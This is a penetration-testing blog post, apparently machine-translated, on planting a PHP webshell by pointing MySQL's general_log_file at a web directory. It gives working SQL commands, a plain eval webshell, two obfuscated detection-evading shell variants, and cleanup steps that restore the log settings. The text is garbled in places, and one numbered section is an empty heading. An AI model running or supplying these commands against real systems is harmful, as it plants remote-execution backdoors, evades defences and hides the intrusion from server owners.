a brief analysis of the feasibility of using mysql general log to write shell

Posted by millikan at 2020-04-12

0 × 01 Preface:

In the process of actual penetration, we are likely to encounter such a situation. It is obvious that the MySQL root permission is serious, but when we actually use the into outfile to write the shell, we can't write it in any way, provided that we have absolutely write permission for the target website directory and the MySQL root user has not been downgraded, In general, this is probably because the into outfile is disabled or WAF is blocked. I hope the following methods can help you

0 × 02 take shell:

The principle of using MySQL log file to write shell is very simple. When we open general log, every SQL executed will be automatically recorded in the log file. In this way, we can also write our shell code automatically. Operation and maintenance may usually use this to check and slow down the query, and only open it temporarily, so if you want to use it, We can only open it manually, which is why we need root permission, because it involves MySQL parameter configuration. In fact, here is a little bit of MySQL common sense, which is very clear:

先看下当前mysql默认的日志位置在什么地方,'C:\ProgramData\MySQL\MySQL Server 5.5\Data\2008R2DC.log'
mysql> show variables like '%general%';

mysql> set global general_log = on;

By default, it is basically closed. Otherwise, the number of records added, deleted, modified and queried may be very large. MySQL > set global general_log = on;

mysql> set global general_log_file = 'C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs/abouts.php';

mysql> select '<?php eval($_POST[request]);?>';

Start to write a shell. This is a normal shell. If there is WAF, you can use the following shell MySQL > select '< PHP Eval ($_post [request]);? >';

mysql> select "<?php $sl = create_function('', @$_REQUEST['klion']);$sl();?>"; 免杀shell,eval方式
mysql> SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['klion']));?>"; 别人的免杀shell,assert&base64encode方式

0 × 03 we must deal with the future

mysql> set global general_log_file = 'C:\ProgramData\MySQL\MySQL Server 5.5\Data\2008R2DC.log';
mysql> set global general_log = off;

0 * 04 words

It's not a particularly novel skill. It's all about the mining and utilization of some basic features of MySQL itself. Your real understanding is the main thing. The utilization process may not be smooth. It's your real harvest to record the problem-solving process. Good luck

Two necessary conditions for 0 × 05 to be used successfully


Welcome to the "official account of my blog" or "direct scan code", which focuses on the personal WeChat public number "apt attack and defense guide", will usually start here, other platforms will be updated and pushed, and I have always been looking forward to learning and communicating with more like-minded friends.